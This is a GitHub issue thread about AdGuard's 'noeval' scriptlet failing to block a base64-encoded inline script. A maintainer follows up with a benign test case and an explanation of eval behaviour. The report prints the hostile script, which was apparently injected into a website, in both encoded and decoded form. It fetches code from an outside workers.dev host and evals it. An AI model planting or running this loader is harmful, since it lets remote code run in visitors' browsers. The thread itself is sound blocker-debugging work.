AdguardTeam
'noeval' cannot break inline 'data:text/javascript;base64' script
Inline script
<script src="data:text/javascript;base64,Y29uc3QgZ2V0X3NjcmlwdD0oKT0+e2NvbnN0IHJlcXVlc3Q9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVxdWVzdC5vcGVuKCdHRVQnLCdodHRwczovL2R1c3QtMDAwMS5kZWxvcmF6YWhub3cud29ya2Vycy5kZXYvJyxmYWxzZSk7cmVxdWVzdC5zZW5kKG51bGwpO3JldHVybiByZXF1ZXN0LnJlc3BvbnNlVGV4dDt9CmV2YWwoZ2V0X3NjcmlwdCgpKTs=">
Decoded script
const get_script=()=>{const request=new XMLHttpRequest();request.open('GET','https://dust-0001.delorazahnow.workers.dev/',false);request.send(null);return request.responseText;} eval(get_script());
Expected behavior
'noeval' does not break encoded or decoded script.
Related to https://github.com/AdguardTeam/AdguardFilters/issues/160588 The script was probably added without the site owner's knowledge, and now the script is not on the site.
Environment
Chrome 116
AdGuard 4.2.167 or AdGuard for Windows 7.15 n8
Could you please provide some information how do you check if it does not work?
In this case, the argument passed to eval is a function and it looks like that get_script() is executed firstly (not in eval) and then the result return request.responseText should be in eval.
I have checked something like this:
<script src="data:text/javascript;base64,Y29uc3QgZ2V0X3NjcmlwdD0oKT0+e2NvbnNvbGUubG9nKCdzaG91bGQgbm90IGJlIHByZXZlbnRlZCcpOyByZXR1cm4gJ2FsZXJ0KCJ0ZXN0IC0gc2hvdWxkIGJlIHByZXZlbnRlZCIpJzt9CmV2YWwoZ2V0X3NjcmlwdCgpKTs=">
</script>
Decoded:
const get_script=()=>{console.log('should not be prevented'); return 'alert("test - should be prevented")';}
eval(get_script());
alert("test - should be prevented") is correctly prevented by #%#//scriptlet('noeval'), but should not be prevented is still displayed in the console, because it's not in eval.
I thought so too, but it looks like that if function is passed as an argument in eval then only this what is returned by a function is executed in eval.